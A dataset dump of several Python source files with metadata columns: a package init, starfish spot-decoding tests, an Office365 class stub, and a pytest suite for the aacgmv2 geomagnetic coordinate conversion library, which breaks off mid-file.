| 12.25 | 25 | 0.734694 | 6 | 49 | 6 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.05 | 0.183673 | 49 | 3 | 26 | 16.333333 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9849016b8628479c7f7478a25ac44c8795f2acdd | 28 | py | Python | __init__.py | rogerlew/all_your_base | 3b6f1cec0d6ad51a93aa1be47e29208a5217061c | [
"BSD-3-Clause"
] | null | null | null | __init__.py | rogerlew/all_your_base | 3b6f1cec0d6ad51a93aa1be47e29208a5217061c | [
"BSD-3-Clause"
] | null | null | null | __init__.py | rogerlew/all_your_base | 3b6f1cec0d6ad51a93aa1be47e29208a5217061c | [
"BSD-3-Clause"
] | null | null | null | from .all_your_base import * | 28 | 28 | 0.821429 | 5 | 28 | 4.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.107143 | 28 | 1 | 28 | 28 | 0.84 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
9861d55d2295f5fdc861a5fbaa0ab9f18794e691 | 1,926 | py | Python | starfish/core/spots/Decode/test/test_decoding_without_spots.py | kne42/starfish | 78b348c9756f367221dcca725cfa5107e5520b33 | [
"MIT"
] | null | null | null | starfish/core/spots/Decode/test/test_decoding_without_spots.py | kne42/starfish | 78b348c9756f367221dcca725cfa5107e5520b33 | [
"MIT"
] | null | null | null | starfish/core/spots/Decode/test/test_decoding_without_spots.py | kne42/starfish | 78b348c9756f367221dcca725cfa5107e5520b33 | [
"MIT"
] | null | null | null | import os
from tempfile import TemporaryDirectory
import pandas as pd
import starfish
from starfish.core.test.factories import two_spot_sparse_coded_data_factory
def test_per_round_max_spot_decoding_without_spots():
codebook, image_stack, max_intensity = two_spot_sparse_coded_data_factory()
bd = starfish.spots.DetectSpots.BlobDetector(
min_sigma=1, max_sigma=1, num_sigma=1, threshold=max_intensity + 0.1)
no_spots = bd.run(image_stack)
decode = starfish.spots.Decode.PerRoundMaxChannel(codebook)
decoded_no_spots: starfish.IntensityTable = decode.run(no_spots)
decoded_spot_table = decoded_no_spots.to_decoded_spots()
with TemporaryDirectory() as dir_:
filename = os.path.join(dir_, 'test.csv')
decoded_spot_table.save_csv(os.path.join(dir_, 'test.csv'))
# verify we can concatenate two empty tables
table1 = pd.read_csv(filename, index_col=0)
table2 = pd.read_csv(filename, index_col=0)
pd.concat([table1, table2], axis=0)
def test_metric_decoding_without_spots():
codebook, image_stack, max_intensity = two_spot_sparse_coded_data_factory()
bd = starfish.spots.DetectSpots.BlobDetector(
min_sigma=1, max_sigma=1, num_sigma=1, threshold=max_intensity + 0.1)
no_spots = bd.run(image_stack)
decode = starfish.spots.Decode.MetricDistance(
codebook, max_distance=0, min_intensity=max_intensity + 0.1
)
decoded_no_spots: starfish.IntensityTable = decode.run(no_spots)
decoded_spot_table = decoded_no_spots.to_decoded_spots()
with TemporaryDirectory() as dir_:
filename = os.path.join(dir_, 'test.csv')
decoded_spot_table.save_csv(os.path.join(dir_, 'test.csv'))
# verify we can concatenate two empty tables
table1 = pd.read_csv(filename, index_col=0)
table2 = pd.read_csv(filename, index_col=0)
pd.concat([table1, table2], axis=0)
| 35.018182 | 79 | 0.731049 | 270 | 1,926 | 4.907407 | 0.255556 | 0.042264 | 0.042264 | 0.039245 | 0.826415 | 0.826415 | 0.804528 | 0.804528 | 0.804528 | 0.804528 | 0 | 0.01697 | 0.173936 | 1,926 | 54 | 80 | 35.666667 | 0.815839 | 0.044133 | 0 | 0.685714 | 0 | 0 | 0.01741 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057143 | false | 0 | 0.142857 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
98b47a681e129d062eb172e9d48b3f940d3782ca | 279 | py | Python | office365/outlook/calendar/meeting_time_suggestion.py | rikeshtailor/Office365-REST-Python-Client | ca7bfa1b22212137bb4e984c0457632163e89a43 | [
"MIT"
] | 544 | 2016-08-04T17:10:16.000Z | 2022-03-31T07:17:20.000Z | office365/outlook/calendar/meeting_time_suggestion.py | rikeshtailor/Office365-REST-Python-Client | ca7bfa1b22212137bb4e984c0457632163e89a43 | [
"MIT"
] | 438 | 2016-10-11T12:24:22.000Z | 2022-03-31T19:30:35.000Z | office365/outlook/calendar/meeting_time_suggestion.py | rikeshtailor/Office365-REST-Python-Client | ca7bfa1b22212137bb4e984c0457632163e89a43 | [
"MIT"
] | 202 | 2016-08-22T19:29:40.000Z | 2022-03-30T20:26:15.000Z | from office365.runtime.client_value import ClientValue
class MeetingTimeSuggestion(ClientValue):
"""
A meeting suggestion that includes information like meeting time, attendance likelihood, individual availability,
and available meeting locations.
"""
pass
| 27.9 | 117 | 0.774194 | 28 | 279 | 7.678571 | 0.892857 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012987 | 0.172043 | 279 | 9 | 118 | 31 | 0.917749 | 0.523297 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
7f6d7c91b38d0ca355a04a19e95b43fb91aa77e9 | 50,549 | py | Python | aacgmv2/tests/test_py_aacgmv2.py | DannoPeters/aacgmv2 | 6f21485453a3cfc76328cc6684952de0b1fc4a50 | [
"MIT"
] | null | null | null | aacgmv2/tests/test_py_aacgmv2.py | DannoPeters/aacgmv2 | 6f21485453a3cfc76328cc6684952de0b1fc4a50 | [
"MIT"
] | null | null | null | aacgmv2/tests/test_py_aacgmv2.py | DannoPeters/aacgmv2 | 6f21485453a3cfc76328cc6684952de0b1fc4a50 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import division, absolute_import, unicode_literals
import datetime as dt
import numpy as np
import pytest
import aacgmv2
class TestPyAACGMV2:
@classmethod
def test_module_structure(self):
"""Test module structure"""
assert aacgmv2
assert aacgmv2.convert_bool_to_bit
assert aacgmv2.convert_str_to_bit
assert aacgmv2.convert_mlt
assert aacgmv2.convert_latlon
assert aacgmv2.convert_latlon_arr
assert aacgmv2.get_aacgm_coord
assert aacgmv2.get_aacgm_coord_arr
assert aacgmv2.wrapper
assert aacgmv2.wrapper.set_coeff_path
@classmethod
def test_module_parameters(self):
"""Test module constants"""
from os import path
path1 = path.join("aacgmv2", "aacgmv2", "aacgm_coeffs",
"aacgm_coeffs-12-")
if aacgmv2.AACGM_v2_DAT_PREFIX.find(path1) < 0:
raise AssertionError()
path2 = path.join("aacgmv2", "aacgmv2", "magmodel_1590-2015.txt")
if aacgmv2.IGRF_COEFFS.find(path2) < 0:
raise AssertionError()
del path1, path2
class TestConvertLatLon:
def setup(self):
"""Runs before every method to create a clean testing setup"""
self.dtime = dt.datetime(2015, 1, 1, 0, 0, 0)
self.ddate = dt.date(2015, 1, 1)
self.lat_out = None
self.lon_out = None
self.r_out = None
def teardown(self):
"""Runs after every method to clean up previous testing"""
del self.lat_out, self.lon_out, self.r_out, self.dtime, self.ddate
def test_convert_latlon(self):
"""Test single value latlon conversion"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(60, 0, 300, self.dtime)
np.testing.assert_almost_equal(self.lat_out, 58.2258, decimal=4)
np.testing.assert_almost_equal(self.lon_out, 81.1685, decimal=4)
np.testing.assert_almost_equal(self.r_out, 1.0457, decimal=4)
def test_convert_latlon_badidea(self):
"""Test single value latlon conversion with a bad flag"""
code = "G2A | BADIDEA"
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(60, 0, 3000, self.dtime, code)
np.testing.assert_almost_equal(self.lat_out, 64.3568, decimal=4)
np.testing.assert_almost_equal(self.lon_out, 83.3027, decimal=4)
np.testing.assert_almost_equal(self.r_out, 1.4694, decimal=4)
del code
def test_convert_latlon_location_failure(self):
"""Test single value latlon conversion with a bad location"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(0, 0, 0, self.dtime)
if not (np.isnan(self.lat_out) & np.isnan(self.lon_out) &
np.isnan(self.r_out)):
raise AssertionError()
def test_convert_latlon_time_failure(self):
"""Test single value latlon conversion with a bad datetime"""
with pytest.raises(AssertionError):
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(60, 0, 300, None)
def test_convert_latlon_datetime_date(self):
"""Test single latlon conversion with date and datetime input"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(60, 0, 300, self.ddate)
lat_2, lon_2, r_2 = aacgmv2.convert_latlon(60, 0, 300, self.dtime)
if self.lat_out != lat_2:
raise AssertionError()
if self.lon_out != lon_2:
raise AssertionError()
if self.r_out != r_2:
raise AssertionError()
del lat_2, lon_2, r_2
def test_warning_below_ground_convert_latlon(self):
""" Test that a warning is issued if altitude is below zero"""
import logbook
lwarn = u"conversion not intended for altitudes < 0 km"
with logbook.TestHandler() as handler:
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(60, 0, -1, self.dtime)
if not handler.has_warning(lwarn):
raise AssertionError()
handler.close()
def test_convert_latlon_maxalt_failure(self):
"""For a single value, test failure for an altitude too high for
coefficients"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon(60, 0, 2001, self.dtime)
if not (np.isnan(self.lat_out) & np.isnan(self.lon_out) &
np.isnan(self.r_out)):
raise AssertionError()
def test_convert_latlon_lat_failure(self):
"""Test error return for co-latitudes above 90 for a single value"""
with pytest.raises(AssertionError):
aacgmv2.convert_latlon(91, 0, 300, self.dtime)
with pytest.raises(AssertionError):
aacgmv2.convert_latlon(-91, 0, 300, self.dtime)
class TestConvertLatLonArr:
def setup(self):
"""Runs before every method to create a clean testing setup"""
self.dtime = dt.datetime(2015, 1, 1, 0, 0, 0)
self.ddate = dt.date(2015, 1, 1)
self.lat_out = None
self.lon_out = None
self.r_out = None
def teardown(self):
"""Runs after every method to clean up previous testing"""
del self.lat_out, self.lon_out, self.r_out, self.dtime, self.ddate
def test_convert_latlon_arr_single_val(self):
"""Test array latlon conversion for a single value"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr(60, 0, 300, self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (1,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.2257709], rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959], rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346], rtol=1e-4)
def test_convert_latlon_arr_list_single(self):
"""Test array latlon conversion for list input of single values"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60], [0], [300], self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (1,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.2257709], rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959], rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346], rtol=1e-4)
def test_convert_latlon_arr_list(self):
"""Test array latlon conversion for list input"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60, 61], [0, 0], [300, 300],
self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.22577090, 59.31860933],
rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959, 81.61398933],
rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346, 1.04561304],
rtol=1e-4)
def test_convert_latlon_arr_arr_single(self):
"""Test array latlon conversion for array input of shape (1,)"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr(np.array([60]), np.array([0]),
np.array([300]), self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (1,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.2257709], rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959], rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346], rtol=1e-4)
def test_convert_latlon_arr_arr(self):
"""Test array latlon conversion for array input"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr(np.array([60, 61]),
np.array([0, 0]),
np.array([300, 300]),
self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.22577090, 59.31860933],
rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959, 81.61398933],
rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346, 1.04561304],
rtol=1e-4)
def test_convert_latlon_arr_list_mix(self):
"""Test array latlon conversion for mixed types with list"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60, 61], 0, 300, self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.22577090, 59.31860933],
rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959, 81.61398933],
rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346, 1.04561304],
rtol=1e-4)
def test_convert_latlon_arr_arr_mix(self):
"""Test array latlon conversion for mixed type with an array"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr(np.array([60, 61]), 0,
300, self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out, [58.22577090, 59.31860933],
rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [81.16846959, 81.61398933],
rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.04566346, 1.04561304],
rtol=1e-4)
def test_convert_latlon_arr_mult_arr_mix(self):
"""Test array latlon conversion for mix type with multi-dim array"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr(np.array([[60, 61, 62],
[63, 64, 65]]),
0, 300, self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (2, 3)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out,
[[58.2257709, 59.3186093, 60.4039740],
[61.4819893, 62.5527635, 63.6163840]],
rtol=1e-4)
np.testing.assert_allclose(self.lon_out,
[[81.1684696, 81.6139893, 82.0871880],
[82.5909499, 83.1285895, 83.7039272]],
rtol=1e-4)
np.testing.assert_allclose(self.r_out,
[[1.04566346, 1.04561304, 1.04556369],
[1.04551548, 1.04546847, 1.04542272]],
rtol=1e-4)
def test_convert_latlon_arr_mult_arr_unequal(self):
"""Test array latlon conversion for unequal sized multi-dim array"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr(np.array([[60, 61, 62],
[63, 64, 65]]),
np.array([0]),
np.array([300]), self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (2, 3)):
raise AssertionError()
np.testing.assert_allclose(self.lat_out,
[[58.2257709, 59.3186093, 60.4039740],
[61.4819893, 62.5527635, 63.6163840]],
rtol=1e-4)
np.testing.assert_allclose(self.lon_out,
[[81.1684696, 81.6139893, 82.0871880],
[82.5909499, 83.1285895, 83.7039272]],
rtol=1e-4)
np.testing.assert_allclose(self.r_out,
[[1.04566346, 1.04561304, 1.04556369],
[1.04551548, 1.04546847, 1.04542272]],
rtol=1e-4)
def test_convert_latlon_arr_badidea(self):
"""Test array latlon conversion for BADIDEA"""
code = "G2A | BADIDEA"
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60], [0], [3000],
self.dtime, code)
np.testing.assert_allclose(self.lat_out, [64.35677791], rtol=1e-4)
np.testing.assert_allclose(self.lon_out, [83.30272053], rtol=1e-4)
np.testing.assert_allclose(self.r_out, [1.46944431], rtol=1e-4)
def test_convert_latlon_arr_location_failure(self):
"""Test array latlon conversion with a bad location"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([0], [0], [0], self.dtime)
if not isinstance(self.lat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.lon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.r_out, np.ndarray):
raise AssertionError()
if not (self.r_out.shape == self.lon_out.shape and
self.lat_out.shape == self.r_out.shape and
self.r_out.shape == (1,)):
raise AssertionError()
if not np.all([np.isnan(self.lat_out), np.isnan(self.lon_out),
np.isnan(self.r_out)]):
raise AssertionError()
def test_convert_latlon_arr_time_failure(self):
"""Test array latlon conversion with a bad time"""
with pytest.raises(AssertionError):
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60], [0], [300], None)
def test_convert_latlon_arr_datetime_date(self):
"""Test array latlon conversion with date and datetime input"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60], [0], [300], self.ddate)
lat_2, lon_2, r_2 = aacgmv2.convert_latlon_arr([60], [0], [300],
self.dtime)
if self.lat_out != lat_2:
raise AssertionError()
if self.lon_out != lon_2:
raise AssertionError()
if self.r_out != r_2:
raise AssertionError()
del lat_2, lon_2, r_2
def test_warning_below_ground_convert_latlon_arr(self):
""" Test that a warning is issued if altitude is below zero"""
import logbook
lwarn = u"conversion not intended for altitudes < 0 km"
with logbook.TestHandler() as handler:
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60], [0], [-1],
self.dtime)
if not handler.has_warning(lwarn):
raise AssertionError()
handler.close()
def test_convert_latlon_arr_maxalt_failure(self):
"""For an array, test failure for an altitude too high for
coefficients"""
(self.lat_out, self.lon_out,
self.r_out) = aacgmv2.convert_latlon_arr([60], [0], [2001], self.dtime)
if not np.all([np.isnan(self.lat_out), np.isnan(self.lon_out),
np.isnan(self.r_out)]):
raise AssertionError()
def test_convert_latlon_arr_lat_failure(self):
"""Test error return for co-latitudes above 90 for an array"""
with pytest.raises(AssertionError):
aacgmv2.convert_latlon_arr([91, 60, -91], 0, 300, self.dtime)
class TestGetAACGMCoord:
def setup(self):
"""Runs before every method to create a clean testing setup"""
self.dtime = dt.datetime(2015, 1, 1, 0, 0, 0)
self.ddate = dt.date(2015, 1, 1)
self.mlat_out = None
self.mlon_out = None
self.mlt_out = None
def teardown(self):
"""Runs after every method to clean up previous testing"""
del self.mlat_out, self.mlon_out, self.mlt_out, self.dtime, self.ddate
def test_get_aacgm_coord(self):
"""Test single value AACGMV2 calculation, defaults to TRACE"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(60, 0, 300, self.dtime)
np.testing.assert_almost_equal(self.mlat_out, 58.2247, decimal=4)
np.testing.assert_almost_equal(self.mlon_out, 81.1761, decimal=4)
np.testing.assert_almost_equal(self.mlt_out, 0.1889, decimal=4)
def test_get_aacgm_coord_badidea(self):
"""Test single value AACGMV2 calculation with a bad flag"""
method = "BADIDEA"
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(60, 0, 3000, self.dtime,
method=method)
np.testing.assert_almost_equal(self.mlat_out, 64.3568, decimal=4)
np.testing.assert_almost_equal(self.mlon_out, 83.3027, decimal=4)
np.testing.assert_almost_equal(self.mlt_out, 0.3307, decimal=4)
del method
def test_get_aacgm_coord_location_failure(self):
"""Test single value AACGMV2 calculation with a bad location"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(0, 0, 0, self.dtime)
if not (np.isnan(self.mlat_out) & np.isnan(self.mlon_out) &
np.isnan(self.mlt_out)):
raise AssertionError()
def test_get_aacgm_coord_time_failure(self):
"""Test single value AACGMV2 calculation with a bad datetime"""
with pytest.raises(AssertionError):
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(60, 0, 300, None)
def test_get_aacgm_coord_datetime_date(self):
"""Test single AACGMV2 calculation with date and datetime input"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(60, 0, 300, self.ddate)
mlat_2, mlon_2, mlt_2 = aacgmv2.get_aacgm_coord(60, 0, 300, self.dtime)
np.testing.assert_almost_equal(self.mlat_out, mlat_2, decimal=6)
np.testing.assert_almost_equal(self.mlon_out, mlon_2, decimal=6)
np.testing.assert_almost_equal(self.mlt_out, mlt_2, decimal=6)
del mlat_2, mlon_2, mlt_2
def test_warning_below_ground_get_aacgm_coord(self):
""" Test that a warning is issued if altitude is below zero"""
import logbook
lwarn = u"conversion not intended for altitudes < 0 km"
with logbook.TestHandler() as handler:
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(60, 0, -1, self.dtime)
if not handler.has_warning(lwarn):
raise AssertionError()
handler.close()
def test_get_aacgm_coord_maxalt_failure(self):
"""For a single value, test failure for an altitude too high for
coefficients"""
method = ""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(60, 0, 2001, self.dtime,
method=method)
if not (np.isnan(self.mlat_out) & np.isnan(self.mlon_out) &
np.isnan(self.mlt_out)):
raise AssertionError()
def test_get_aacgm_coord_mlat_failure(self):
"""Test error return for co-latitudes above 90 for a single value"""
import logbook
lerr = u"unrealistic latitude"
with logbook.TestHandler() as hhigh:
with pytest.raises(AssertionError):
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(91, 0, 300, self.dtime)
if not hhigh.has_error(lerr):
raise AssertionError()
with logbook.TestHandler() as hlow:
with pytest.raises(AssertionError):
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord(-91, 0, 300,
self.dtime)
if not hlow.has_error(lerr):
raise AssertionError()
hhigh.close()
hlow.close()
class TestGetAACGMCoordArr:
def setup(self):
"""Runs before every method to create a clean testing setup"""
self.dtime = dt.datetime(2015, 1, 1, 0, 0, 0)
self.ddate = dt.date(2015, 1, 1)
self.mlat_out = None
self.mlon_out = None
self.mlt_out = None
def teardown(self):
"""Runs after every method to clean up previous testing"""
del self.mlat_out, self.mlon_out, self.mlt_out, self.dtime, self.ddate
def test_get_aacgm_coord_arr_single_val(self):
"""Test array AACGMV2 calculation for a single value"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr(60, 0, 300, self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (1,)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out, [58.22474610], rtol=1e-4)
np.testing.assert_allclose(self.mlon_out, [81.17611033], rtol=1e-4)
np.testing.assert_allclose(self.mlt_out, [0.18891995], rtol=1e-4)
def test_get_aacgm_coord_arr_list_single(self):
"""Test array AACGMV2 calculation for list input of single values"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60], [0], [300],
self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (1,)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out, [58.22474610], rtol=1e-4)
np.testing.assert_allclose(self.mlon_out, [81.17611033], rtol=1e-4)
np.testing.assert_allclose(self.mlt_out, [0.18891995], rtol=1e-4)
def test_get_aacgm_coord_arr_list(self):
"""Test array AACGMV2 calculation for list input"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr([60, 61], [0, 0],
[300, 300], self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out,
[58.22474610, 59.31648007], rtol=1e-4)
np.testing.assert_allclose(self.mlon_out,
[81.17611033, 81.62281360], rtol=1e-4)
np.testing.assert_allclose(self.mlt_out,
[0.18891995, 0.21870017], rtol=1e-4)
def test_get_aacgm_coord_arr_arr_single(self):
"""Test array AACGMV2 calculation for array with a single value"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr(np.array([60]),
np.array([0]),
np.array([300]),
self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (1,)):
raise AssertionError()
np.testing.assert_almost_equal(self.mlat_out, 58.2247, decimal=4)
np.testing.assert_almost_equal(self.mlon_out, 81.1761, decimal=4)
np.testing.assert_almost_equal(self.mlt_out, 0.1889, decimal=4)
def test_get_aacgm_coord_arr_arr(self):
"""Test array AACGMV2 calculation for an array"""
(self.mlat_out, self.mlon_out,
self.mlt_out) = aacgmv2.get_aacgm_coord_arr(np.array([60, 61]),
np.array([0, 0]),
np.array([300, 300]),
self.dtime)
if not isinstance(self.mlat_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlon_out, np.ndarray):
raise AssertionError()
if not isinstance(self.mlt_out, np.ndarray):
raise AssertionError()
if not (self.mlt_out.shape == self.mlon_out.shape and
self.mlat_out.shape == self.mlt_out.shape and
self.mlt_out.shape == (2,)):
raise AssertionError()
np.testing.assert_allclose(self.mlat_out,
[58.22474610, 59.31648007], rtol=1e-4)
np.testing.assert_allclose(self.mlon_out,
[81.17611033, 81.62281360], rtol=1e-4)
np.testing.assert_allclose(self.mlt_out,
[0.18891995, 0.21870017], rtol=1e-4)
def test_get_aacgm_coord_arr_list_mix(self):
"""Test array AACGMV2 calculation for a list and floats"""
